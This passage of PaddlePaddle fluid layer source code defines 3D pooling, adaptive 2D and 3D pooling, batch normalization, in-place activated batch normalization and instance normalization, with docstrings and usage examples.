pool_stride = 1,
global_pooling=False)
# average pool3d
pool3d = fluid.layers.pool3d(
input = data,
pool_size = 2,
pool_type = "avg",
pool_stride = 1,
global_pooling=False)
# global average pool3d
pool3d = fluid.layers.pool3d(
input = data,
pool_size = 2,
pool_type = "avg",
pool_stride = 1,
global_pooling=True)
# example 1:
# Attr(pool_padding) is a list with 6 elements, Attr(data_format) is "NCDHW".
out_1 = fluid.layers.pool3d(
input = data,
pool_size = 2,
pool_type = "avg",
pool_stride = 1,
pool_padding = [1, 2, 1, 0, 1, 2],
global_pooling = False,
data_format = "NCDHW")
# example 2:
# Attr(pool_padding) is a string, Attr(data_format) is "NCDHW".
out_2 = fluid.layers.pool3d(
input = data,
pool_size = 3,
pool_type = "avg",
pool_stride = 1,
pool_padding = "VALID",
global_pooling = False,
data_format = "NCDHW")
"""
if pool_type not in ["max", "avg"]:
raise ValueError(
"Unknown Attr(pool_type): '%s'. It can only be 'max' or 'avg'.",
str(pool_type))
if global_pooling is False and pool_size == -1:
raise ValueError(
"When Attr(global_pooling) is False, Attr(pool_size) must be passed "
"and be a valid value. Received Attr(pool_size): %s." %
str(pool_size))
if not isinstance(use_cudnn, bool):
raise TypeError("Attr(use_cudnn) should be True or False. Received "
"Attr(use_cudnn): %s. " % str(use_cudnn))
if data_format not in ["NCDHW", "NDHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCDHW' or 'NDHWC'. Received "
"Attr(data_format): %s" % str(data_format))
pool_size = utils.convert_to_list(pool_size, 3, 'pool_size')
pool_stride = utils.convert_to_list(pool_stride, 3, 'pool_stride')
def update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, (list, tuple)):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 5:
if is_list_or_tuple(padding[0]) and (data_format == "NCDHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero pool_padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:5]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NDHWC"):
if not (padding[0] == [0, 0] and padding[4] == [0, 0]):
raise ValueError(
"Non-zero pool_padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:4]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
elif is_list_or_tuple(padding) and len(padding) == 6:
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
else:
padding = utils.convert_to_list(padding, 3, 'padding')
return padding
padding_algorithm = "EXPLICIT"
if isinstance(pool_padding, str):
pool_padding = pool_padding.upper()
if pool_padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown Attr(pool_padding): '%s'. It can only be 'SAME' or 'VALID'."
% str(pool_padding))
if pool_padding == "VALID":
padding_algorithm = "VALID"
pool_padding = [0, 0, 0]
if ceil_mode != False:
raise ValueError(
"When Attr(pool_padding) is \"VALID\", ceil_mode must be False. "
"Received ceil_mode: True.")
elif pool_padding == "SAME":
padding_algorithm = "SAME"
pool_padding = [0, 0, 0]
pool_padding = update_padding(pool_padding, data_format)
op_type = "pool3d"
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype()
pool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type=op_type,
inputs={"X": input},
outputs={"Out": pool_out},
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"global_pooling": global_pooling,
"strides": pool_stride,
"paddings": pool_padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": use_cudnn,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": exclusive,
"data_format": data_format,
})
return pool_out
@templatedoc(op_type="pool2d")
def adaptive_pool2d(input,
pool_size,
pool_type="max",
require_index=False,
name=None):
"""
This operation calculates the output based on the input, pool_size,
pool_type parameters. Input(X) and output(Out) are in NCHW format, where N is batch
size, C is the number of channels, H is the height of the feature, and W is
the width of the feature. Parameters(pool_size) should contain two elements which
represent height and width, respectively. Also the H and W dimensions of output(Out)
is same as Parameter(pool_size). The output tensor shape will be [N, C, pool_size[0], pool_size[1]]
For average adaptive pool2d:
.. math::
hstart &= floor(i * H_{in} / H_{out})
hend &= ceil((i + 1) * H_{in} / H_{out})
wstart &= floor(j * W_{in} / W_{out})
wend &= ceil((j + 1) * W_{in} / W_{out})
Output(i ,j) &= \\frac{sum(Input[hstart:hend, wstart:wend])}{(hend - hstart) * (wend - wstart)}
Args:
input (Variable): The input tensor of pooling operator, which is a 4-D tensor
with shape [N, C, H, W]. The format of input tensor is NCHW,
where N is batch size, C is the number of channels, H is the
height of the feature, and W is the width of the feature.
The data type is float32 or float64.
pool_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain two integers, (pool_size_Height, pool_size_Width).
pool_type: ${pooling_type_comment}
require_index (bool): If true, the index of max pooling point will be returned along
with outputs. It cannot be set in average pooling type. Default False.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: The output tensor of adaptive pooling result. The data type is same
as input tensor.
Raises:
ValueError: 'pool_type' is not 'max' nor 'avg'.
ValueError: invalid setting 'require_index' true when 'pool_type' is 'avg'.
ValueError: 'pool_size' should be a list or tuple with length as 2.
Examples:
.. code-block:: python
# average adaptive pool2d
# suppose input data in shape of [N, C, H, W], `pool_size` is [m, n],
# output shape is [N, C, m, n], adaptive pool divide H and W dimensions
# of input data into m * n grids averagely and performs poolings in each
# grid to get output.
# adaptive average pool performs calculations as follow:
#
# for i in range(m):
# for j in range(n):
# hstart = floor(i * H / m)
# hend = ceil((i + 1) * H / m)
# wstart = floor(i * W / n)
# wend = ceil((i + 1) * W / n)
# output[:, :, i, j] = avg(input[:, :, hstart: hend, wstart: wend])
#
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
pool_out = fluid.layers.adaptive_pool2d(
input=data,
pool_size=[3, 3],
pool_type='avg')
# max adaptive pool2d
# suppose input data in shape of [N, C, H, W], `pool_size` is [m, n],
# output shape is [N, C, m, n], adaptive pool divide H and W dimensions
# of input data into m * n grids averagely and performs poolings in each
# grid to get output.
# adaptive average pool performs calculations as follow:
#
# for i in range(m):
# for j in range(n):
# hstart = floor(i * H / m)
# hend = ceil((i + 1) * H / m)
# wstart = floor(i * W / n)
# wend = ceil((i + 1) * W / n)
# output[:, :, i, j] = max(input[:, :, hstart: hend, wstart: wend])
#
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
pool_out = fluid.layers.adaptive_pool2d(
input=data,
pool_size=[3, 3],
pool_type='max')
"""
check_variable_and_dtype(
input, 'input', ['float16', 'float32', 'float64', 'int32', 'int64'],
'adaptive_pool2d')
check_type(pool_type, 'pool_type', str, 'adaptive_pool2d')
check_type(pool_size, 'pool_size', (int, list, tuple), 'adaptive_pool2d')
check_type(require_index, 'require_index', bool, 'adaptive_pool2d')
if pool_type not in ["max", "avg"]:
raise ValueError(
"Unknown pool_type: '%s'. It can only be 'max' or 'avg'.",
str(pool_type))
if pool_type == "avg" and require_index:
raise ValueError(
"invalid setting 'require_index' true when 'pool_type' is 'avg'.")
pool_size = utils.convert_to_list(pool_size, 2, 'pool_size')
if pool_type == "max":
l_type = 'max_pool2d_with_index'
else:
l_type = "pool2d"
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype()
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
if pool_type == "max":
mask = helper.create_variable_for_type_inference(dtype)
outputs["Mask"] = mask
helper.append_op(
type=l_type,
inputs={"X": input},
outputs=outputs,
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"adaptive": True,
})
return (pool_out, mask) if require_index else pool_out
@templatedoc(op_type="pool3d")
def adaptive_pool3d(input,
pool_size,
pool_type="max",
require_index=False,
name=None):
"""
This operation calculates the output based on the input, pool_size,
pool_type parameters. Input(X) and output(Out) are in NCDHW format, where N is batch
size, C is the number of channels, D is the depth of the feature, H is the height of
the feature, and W is the width of the feature. Parameters(pool_size) should contain
three elements which represent height and width, respectively. Also the D, H and W
dimensions of output(Out) is same as Parameter(pool_size). The output tensor shape
will be [N, C, pool_size[0], pool_size[1], pool_size[2]]
For average adaptive pool3d:
.. math::
dstart &= floor(i * D_{in} / D_{out})
dend &= ceil((i + 1) * D_{in} / D_{out})
hstart &= floor(j * H_{in} / H_{out})
hend &= ceil((j + 1) * H_{in} / H_{out})
wstart &= floor(k * W_{in} / W_{out})
wend &= ceil((k + 1) * W_{in} / W_{out})
Output(i ,j, k) &= \\frac{sum(Input[dstart:dend, hstart:hend, wstart:wend])}{(dend - dstart) * (hend - hstart) * (wend - wstart)}
Args:
input (Variable): The input tensor of pooling operator, which is a 5-D tensor with
shape [N, C, D, H, W]. The format of input tensor is NCDHW, where
N is batch size, C is the number of channels, D is the depth of the feature,
H is the height of the feature, and W is the width of the feature.
The data type is float32 or float64.
pool_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain three integers, (Depth, Height, Width).
pool_type: ${pooling_type_comment}
require_index (bool): If true, the index of max pooling point will be returned along
with outputs. It cannot be set in average pooling type. Default False.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: The output tensor of adaptive pooling result. The data type is same as input tensor.
Raises:
ValueError: 'pool_type' is not 'max' nor 'avg'.
ValueError: invalid setting 'require_index' true when 'pool_type' is 'avg'.
ValueError: 'pool_size' should be a list or tuple with length as 2.
Examples:
.. code-block:: python
# average adaptive pool3d
# suppose input data in shape of [N, C, D, H, W], `pool_size` is [l, m, n],
# output shape is [N, C, l, m, n], adaptive pool divide D, H and W dimensions
# of input data into l * m * n grids averagely and performs poolings in each
# grid to get output.
# adaptive average pool performs calculations as follow:
#
# for i in range(l):
# for j in range(m):
# for k in range(n):
# dstart = floor(i * D / l)
# dend = ceil((i + 1) * D / l)
# hstart = floor(j * H / m)
# hend = ceil((j + 1) * H / m)
# wstart = floor(k * W / n)
# wend = ceil((k + 1) * W / n)
# output[:, :, i, j, k] =
# avg(input[:, :, dstart:dend, hstart: hend, wstart: wend])
#
import paddle.fluid as fluid
data = fluid.data(
name='data', shape=[None, 3, 32, 32, 32], dtype='float32')
pool_out = fluid.layers.adaptive_pool3d(
input=data,
pool_size=[3, 3, 3],
pool_type='avg')
# max adaptive pool3d
# suppose input data in shape of [N, C, D, H, W], `pool_size` is [l, m, n],
# output shape is [N, C, l, m, n], adaptive pool divide D, H and W dimensions
# of input data into l * m * n grids averagely and performs poolings in each
# grid to get output.
# adaptive average pool performs calculations as follow:
#
# for i in range(l):
# for j in range(m):
# for k in range(n):
# dstart = floor(i * D / l)
# dend = ceil((i + 1) * D / l)
# hstart = floor(j * H / m)
# hend = ceil((j + 1) * H / m)
# wstart = floor(k * W / n)
# wend = ceil((k + 1) * W / n)
# output[:, :, i, j, k] =
# avg(input[:, :, dstart:dend, hstart: hend, wstart: wend])
#
import paddle.fluid as fluid
data = fluid.data(
name='data', shape=[None, 3, 32, 32, 32], dtype='float32')
pool_out = fluid.layers.adaptive_pool3d(
input=data,
pool_size=[3, 3, 3],
pool_type='max')
"""
check_variable_and_dtype(
input, 'input', ['float16', 'float32', 'float64', 'int32', 'int64'],
'adaptive_pool3d')
check_type(pool_type, 'pool_type', str, 'adaptive_pool3d')
check_type(pool_size, 'pool_size', (int, list, tuple), 'adaptive_pool3d')
check_type(require_index, 'require_index', bool, 'adaptive_pool3d')
if pool_type not in ["max", "avg"]:
raise ValueError(
"Unknown pool_type: '%s'. It can only be 'max' or 'avg'.",
str(pool_type))
if pool_type == "avg" and require_index:
raise ValueError(
"invalid setting 'require_index' true when 'pool_type' is 'avg'.")
pool_size = utils.convert_to_list(pool_size, 3, 'pool_size')
if pool_type == "max":
l_type = 'max_pool3d_with_index'
else:
l_type = "pool3d"
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype()
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
if pool_type == "max":
mask = helper.create_variable_for_type_inference(dtype)
outputs["Mask"] = mask
helper.append_op(
type=l_type,
inputs={"X": input},
outputs=outputs,
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"adaptive": True,
})
return (pool_out, mask) if require_index else pool_out
def batch_norm(input,
act=None,
is_test=False,
momentum=0.9,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
data_layout='NCHW',
in_place=False,
name=None,
moving_mean_name=None,
moving_variance_name=None,
do_model_average_for_mean_and_var=True,
use_global_stats=False):
"""
**Batch Normalization Layer**
Can be used as a normalizer function for convolution or fully_connected operations.
The required data format for this layer is one of the following:
1. NHWC `[batch, in_height, in_width, in_channels]`
2. NCHW `[batch, in_channels, in_height, in_width]`
Refer to `Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift <https://arxiv.org/pdf/1502.03167.pdf>`_
for more details.
:math:`input` is the input features over a mini-batch.
.. math::
\\mu_{\\beta} &\\gets \\frac{1}{m} \\sum_{i=1}^{m} x_i \\qquad &//\\
\ mini-batch\ mean \\\\
\\sigma_{\\beta}^{2} &\\gets \\frac{1}{m} \\sum_{i=1}^{m}(x_i - \\
\\mu_{\\beta})^2 \\qquad &//\ mini-batch\ variance \\\\
\\hat{x_i} &\\gets \\frac{x_i - \\mu_\\beta} {\\sqrt{\\
\\sigma_{\\beta}^{2} + \\epsilon}} \\qquad &//\ normalize \\\\
y_i &\\gets \\gamma \\hat{x_i} + \\beta \\qquad &//\ scale\ and\ shift
moving\_mean = moving\_mean * momentum + mini-batch\_mean * (1. - momentum) \\\\
moving\_var = moving\_var * momentum + mini-batch\_var * (1. - momentum)
moving_mean is global mean and moving_var is global variance.
When use_global_stats = True, the :math:`\\mu_{\\beta}`
and :math:`\\sigma_{\\beta}^{2}` are not the statistics of one mini-batch.
They are global (or running) statistics. (It usually got from the
pre-trained model.)
The training and testing (or inference) have the same behavior:
.. math::
\\hat{x_i} &\\gets \\frac{x_i - \\mu_\\beta} {\\sqrt{\\
\\sigma_{\\beta}^{2} + \\epsilon}} \\\\
y_i &\\gets \\gamma \\hat{x_i} + \\beta
Note:
if build_strategy.sync_batch_norm=True, the batch_norm in network will use
sync_batch_norm automatically.
`is_test = True` can only be used in test program and inference program, `is_test` CANNOT be set to True in train program, if you want to use global status from pre_train model in train program, please set `use_global_stats = True`.
Args:
input(Variable): The rank of input variable can be 2, 3, 4, 5. The data type
is float16 or float32 or float64.
act(string, Default None): Activation type, linear|relu|prelu|...
is_test (bool, Default False): A flag indicating whether it is in
test phrase or not.
momentum(float|Variable, Default 0.9): The value used for the moving_mean and
moving_var computation. This should be a float number or a Variable with
shape [1] and data type as float32. The updated formula is:
:math:`moving\_mean = moving\_mean * momentum + new\_mean * (1. - momentum)`
:math:`moving\_var = moving\_var * momentum + new\_var * (1. - momentum)`
Default is 0.9.
epsilon(float, Default 1e-05): A value added to the denominator for
numerical stability. Default is 1e-5.
param_attr(ParamAttr|None): The parameter attribute for Parameter `scale`
of batch_norm. If it is set to None or one attribute of ParamAttr, batch_norm
will create ParamAttr as param_attr, the name of scale can be set in ParamAttr.
If the Initializer of the param_attr is not set, the parameter is initialized
with Xavier. Default: None.
bias_attr(ParamAttr|None): The parameter attribute for the bias of batch_norm.
If it is set to None or one attribute of ParamAttr, batch_norm
will create ParamAttr as bias_attr, the name of bias can be set in ParamAttr.
If the Initializer of the bias_attr is not set, the bias is initialized zero.
Default: None.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
in_place(bool, Default False): Make the input and output of batch norm reuse memory.
name(str|None): For detailed information, please refer to :ref:`api_guide_Name`.
Usually name is no need to set and None by default.
moving_mean_name(str, Default None): The name of moving_mean which store the global Mean. If it
is set to None, batch_norm will save global mean with a random name, otherwise, batch_norm
will save global mean with the string.
moving_variance_name(str, Default None): The name of the moving_variance which store the global Variance.
If it is set to None, batch_norm will save global variance with a random name, otherwise, batch_norm
will save global variance with the string.
do_model_average_for_mean_and_var(bool, Default True): Whether parameter mean and variance should do model
average when model average is enabled.
use_global_stats(bool, Default False): Whether to use global mean and
variance. In inference or test mode, set use_global_stats to true
or is_test to true, and the behavior is equivalent.
In train mode, when setting use_global_stats True, the global mean
and variance are also used during train period.
Returns:
A Variable holding Tensor which is the result after applying batch normalization on the input,
has same shape and data type with input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = fluid.layers.fc(input=x, size=200, param_attr='fc1.w')
hidden2 = fluid.layers.batch_norm(input=hidden1)
.. code-block:: python
# batch_norm with momentum as Variable
import paddle.fluid as fluid
import paddle.fluid.layers.learning_rate_scheduler as lr_scheduler
def get_decay_momentum(momentum_init, decay_steps, decay_rate):
global_step = lr_scheduler._decay_step_counter()
momentum = fluid.layers.create_global_var(
shape=[1],
value=float(momentum_init),
dtype='float32',
# set persistable for save checkpoints and resume
persistable=True,
name="momentum")
div_res = global_step / decay_steps
decayed_momentum = momentum_init * (decay_rate**div_res)
fluid.layers.assign(decayed_momentum, momentum)
return momentum
x = fluid.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = fluid.layers.fc(input=x, size=200, param_attr='fc1.w')
momentum = get_decay_momentum(0.9, 1e5, 0.9)
hidden2 = fluid.layers.batch_norm(input=hidden1, momentum=momentum)
"""
assert bias_attr is not False, "bias_attr should not be False in batch_norm."
helper = LayerHelper('batch_norm', **locals())
check_variable_and_dtype(input, 'input', ['float16', 'float32', 'float64'],
'batch_norm')
dtype = helper.input_dtype()
has_reserve_space = False
if data_layout == 'NHWC':
flag = os.environ.get('FLAGS_cudnn_batchnorm_spatial_persistent')
if flag is not None and flag.lower() in ['true', '1']:
has_reserve_space = True
# use fp32 for bn parameter
if dtype == core.VarDesc.VarType.FP16:
dtype = core.VarDesc.VarType.FP32
input_shape = input.shape
if data_layout == 'NCHW':
channel_num = input_shape[1]
else:
if data_layout == 'NHWC':
channel_num = input_shape[-1]
else:
raise ValueError("unsupported data layout:" + data_layout)
param_shape = [channel_num]
# create parameter
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0))
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True)
mean = helper.create_parameter(
attr=ParamAttr(
name=moving_mean_name,
initializer=Constant(0.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var),
shape=param_shape,
dtype=dtype)
mean.stop_gradient = True
variance = helper.create_parameter(
attr=ParamAttr(
name=moving_variance_name,
initializer=Constant(1.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var),
shape=param_shape,
dtype=dtype)
variance.stop_gradient = True
# create output
# mean and mean_out share the same memory
mean_out = mean
# variance and variance out share the same memory
variance_out = variance
saved_mean = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
saved_variance = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
reserve_space = None
if has_reserve_space:
reserve_space = helper.create_variable_for_type_inference(
dtype=core.VarDesc.VarType.FP16, stop_gradient=True)
batch_norm_out = input if in_place else \
helper.create_variable_for_type_inference(dtype)
inputs = {
"X": input,
"Scale": scale,
"Bias": bias,
"Mean": mean,
"Variance": variance
}
attrs = {
"epsilon": epsilon,
"is_test": is_test,
"data_layout": data_layout,
"use_mkldnn": False,
"fuse_with_relu": False,
"use_global_stats": use_global_stats
}
if isinstance(momentum, Variable):
inputs['MomemtumTensor'] = momentum
else:
attrs['momentum'] = momentum
outputs = {
"Y": batch_norm_out,
"MeanOut": mean_out,
"VarianceOut": variance_out,
"SavedMean": saved_mean,
"SavedVariance": saved_variance
}
if reserve_space is not None:
outputs["ReserveSpace"] = reserve_space
helper.append_op(
type="batch_norm", inputs=inputs, outputs=outputs, attrs=attrs)
return helper.append_activation(batch_norm_out)
def inplace_abn(input,
act=None,
is_test=False,
momentum=0.9,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
data_layout='NCHW',
name=None,
moving_mean_name=None,
moving_variance_name=None,
do_model_average_for_mean_and_var=True,
use_global_stats=False,
act_alpha=1.0):
"""
**In-place Activation Batch Normalization Layer**
This layer calculates batch normalization and activation with in-place memory.
For batch normalization calculations, see `fluid.layers.batch_norm`.
For in-place activation batch normalization, see `In-Place Activated BatchNorm for
Memory-Optimized Training of DNNs <https://arxiv.org/abs/1712.02616>`_
`inplace_abn` only support activation type as `None`, `identity`, `leaky_relu`,
`elu` currently.
`inplace_abn` only support data type as `float32`, `float64` currently.
Note:
if build_strategy.sync_batch_norm=True, the batch_norm in network will use
sync_batch_norm automatically.
`is_test = True` can only be used in test program and inference program, `is_test` CANNOT be set to True in train program, if you want to use global status from pre_train model in train program, please set `use_global_stats = True`.
Args:
input(Variable): The rank of input variable can be 2, 3, 4, 5. The data type
is float16 or float32 or float64.
act(string, Default None): Activation type, linear|relu|prelu|...
is_test (bool, Default False): A flag indicating whether it is in
test phrase or not.
momentum(float|Variable, Default 0.9): The value used for the moving_mean and
moving_var computation. This should be a float number or a Variable with
shape [1] and data type as float32. The updated formula is:
:math:`moving\_mean = moving\_mean * momentum + new\_mean * (1. - momentum)`
:math:`moving\_var = moving\_var * momentum + new\_var * (1. - momentum)`
Default is 0.9.
epsilon(float, Default 1e-05): A value added to the denominator for
numerical stability. Default is 1e-5.
param_attr(ParamAttr|None): The parameter attribute for Parameter `scale`
of inplace_abn. If it is set to None or one attribute of ParamAttr, inplace_abn
will create ParamAttr as param_attr, the name of scale can be set in ParamAttr.
If the Initializer of the param_attr is not set, the parameter is initialized
with Xavier. Default: None.
bias_attr(ParamAttr|None): The parameter attribute for the bias of inplace_abn.
If it is set to None or one attribute of ParamAttr, inplace_abn
will create ParamAttr as bias_attr, the name of bias can be set in ParamAttr.
If the Initializer of the bias_attr is not set, the bias is initialized zero.
Default: None.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
name(str|None): For detailed information, please refer to :ref:`api_guide_Name`.
Usually name is no need to set and None by default.
moving_mean_name(str, Default None): The name of moving_mean which store the global Mean. If it
is set to None, inplace_abn will save global mean with a random name, otherwise, inplace_abn
will save global mean with the string.
moving_variance_name(str, Default None): The name of the moving_variance which store the global Variance.
If it is set to None, inplace_abn, will save global variance with a random name, otherwise, inplace_abn
will save global variance with the string.
do_model_average_for_mean_and_var(bool, Default True): Whether parameter mean and variance should do model
average when model average is enabled.
use_global_stats(bool, Default False): Whether to use global mean and
variance. In inference or test mode, set use_global_stats to true
or is_test to true, and the behavior is equivalent.
In train mode, when setting use_global_stats True, the global mean
and variance are also used during train period.
act_alpha(float, Default 1.0): when activation is in ['elu', 'identity', 'leaky_relu'],
inplace activative batch normalization will be used, and alpha parameter for activation
can be given by this parameter.
Returns:
A Variable holding Tensor which is the result after applying batch normalization and activation on the input,
has same shape and data type with input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = fluid.layers.fc(input=x, size=200, param_attr='fc1.w')
hidden2 = fluid.layers.inplace_abn(input=hidden1)
hidden3 = fluid.layers.inplace_abn(input=hidden2, act='leaky_relu', act_alpha=0.2)
"""
assert act in [None, 'identity', 'leaky_relu', 'elu'], \
"inplace_abn only support act as None, 'identity', " \
"'leaky_relu', 'elu' currently"
assert bias_attr is not False, "bias_attr should not be False in inplace_abn."
helper = LayerHelper('inplace_abn', **locals())
check_variable_and_dtype(input, 'input', ['float32', 'float64'],
'inplace_abn')
dtype = helper.input_dtype()
has_reserve_space = False
if data_layout == 'NHWC':
flag = os.environ.get('FLAGS_cudnn_batchnorm_spatial_persistent')
if flag is not None and flag.lower() in ['true', '1']:
has_reserve_space = True
input_shape = input.shape
if data_layout == 'NCHW':
channel_num = input_shape[1]
else:
if data_layout == 'NHWC':
channel_num = input_shape[-1]
else:
raise ValueError("unsupported data layout:" + data_layout)
param_shape = [channel_num]
# create parameter
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0))
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True)
mean = helper.create_parameter(
attr=ParamAttr(
name=moving_mean_name,
initializer=Constant(0.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var),
shape=param_shape,
dtype=dtype)
mean.stop_gradient = True
variance = helper.create_parameter(
attr=ParamAttr(
name=moving_variance_name,
initializer=Constant(1.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var),
shape=param_shape,
dtype=dtype)
variance.stop_gradient = True
# create output
# mean and mean_out share the same memory
mean_out = mean
# variance and variance out share the same memory
variance_out = variance
saved_mean = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
saved_variance = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
reserve_space = None
if has_reserve_space:
reserve_space = helper.create_variable_for_type_inference(
dtype=core.VarDesc.VarType.FP16, stop_gradient=True)
batch_norm_out = input
inputs = {
"X": input,
"Scale": scale,
"Bias": bias,
"Mean": mean,
"Variance": variance
}
attrs = {
"epsilon": epsilon,
"is_test": is_test,
"data_layout": data_layout,
"use_mkldnn": False,
"fuse_with_relu": False,
"use_global_stats": use_global_stats,
"activation": act,
"alpha": act_alpha,
}
if isinstance(momentum, Variable):
inputs['MomemtumTensor'] = momentum
else:
attrs['momentum'] = momentum
outputs = {
"Y": batch_norm_out,
"MeanOut": mean_out,
"VarianceOut": variance_out,
"SavedMean": saved_mean,
"SavedVariance": saved_variance
}
if reserve_space is not None:
outputs["ReserveSpace"] = reserve_space
helper.append_op(
type="inplace_abn", inputs=inputs, outputs=outputs, attrs=attrs)
return batch_norm_out
def instance_norm(input,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
name=None):
"""
**Instance Normalization Layer**
Can be used as a normalizer function for convolution or fully_connected operations.
The required data format for this layer is one of the following:
DataLayout: NCHW `[batch, in_channels, in_height, in_width]`
Refer to `Instance Normalization: The Missing Ingredient for
Fast Stylization <https://arxiv.org/pdf/1607.08022.pdf>`_
for more details.
:math:`input` is the input features over a mini-batch.
.. math::
\\mu_{\\beta} &\\gets \\frac{1}{HW} \\sum_{i=1}^{HW} x_i \\qquad &//\\
\\ mean\ of\ one\ feature\ map\ in\ mini-batch \\\\
\\sigma_{\\beta}^{2} &\\gets \\frac{1}{HW} \\sum_{i=1}^{HW}(x_i - \\
\\mu_{\\beta})^2 \\qquad &//\ variance\ of\ one\ feature\ map\ in\ mini-batch \\\\
\\hat{x_i} &\\gets \\frac{x_i - \\mu_\\beta} {\\sqrt{\\
\\sigma_{\\beta}^{2} + \\epsilon}} \\qquad &//\ normalize \\\\
y_i &\\gets \\gamma \\hat{x_i} + \\beta \\qquad &//\ scale\ and\ shift
Note:
`H` means height of feature map, `W` means width of feature map.
Args:
input(variable): The rank of input variable can be 2, 3, 4, 5.
The data type is float32 or float64.
epsilon(float, Default 1e-05): A value added to the denominator for
numerical stability. Default is 1e-5.
param_attr(ParamAttr|None): The parameter attribute for Parameter `scale`
of instance_norm. If it is set to None or one attribute of ParamAttr, instance_norm
will create ParamAttr as param_attr, the name of scale can be set in ParamAttr.
If the Initializer of the param_attr is not set, the parameter is initialized
with Xavier. Default: None.
bias_attr(ParamAttr|None): The parameter attribute for the bias of instance_norm.
If it is set to None or one attribute of ParamAttr, instance_norm
will create ParamAttr as bias_attr, the name of bias can be set in ParamAttr.
If the Initializer of the bias_attr is not set, the bias is initialized zero.
Default: None.
name(string, Default None): A name for this layer(optional). If set None, the layer
will be named automatically.
Returns:
A Variable holding Tensor which is the result after applying instance normalization on the input,
has same shape and data type with input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = fluid.layers.fc(input=x, size=200, param_attr='fc1.w')
hidden2 = fluid.layers.instance_norm(input=hidden1)
"""
check_variable_and_dtype(input, 'input', ['float32', 'float64'],
'instance_norm')
assert bias_attr is not False, "bias_attr should not be False in instance_norm."
helper = LayerHelper('instance_norm', **locals())
dtype = helper.input_dtype()
# use fp32 for in parameter
if dtype == core.VarDesc.VarType.FP16:
dtype = core.VarDesc.VarType.FP32
input_shape = input.shape
channel_num = input_shape[1]
param_shape = [channel_num]
# create parameter
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0))
bias = helper.create_parameter(
attr=helper.bias_attr,
shape=param_shape,
dtype=dtype,
is_bias=True,
default_initializer=Constant(0.0))
# create output
saved_mean = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
saved_variance = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
instance_norm_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="instance_norm",
inputs={
"X": input,
"Scale": scale,
"Bias": bias,
},
outputs={
"Y": instance_norm_out,
"SavedMean": saved_mean,
"SavedVariance": saved_variance
},
attrs={"epsilon": epsilon, })
return instance_norm_out
def data_norm(input,
act=None,
epsilon=1e-05,
param_attr=None,
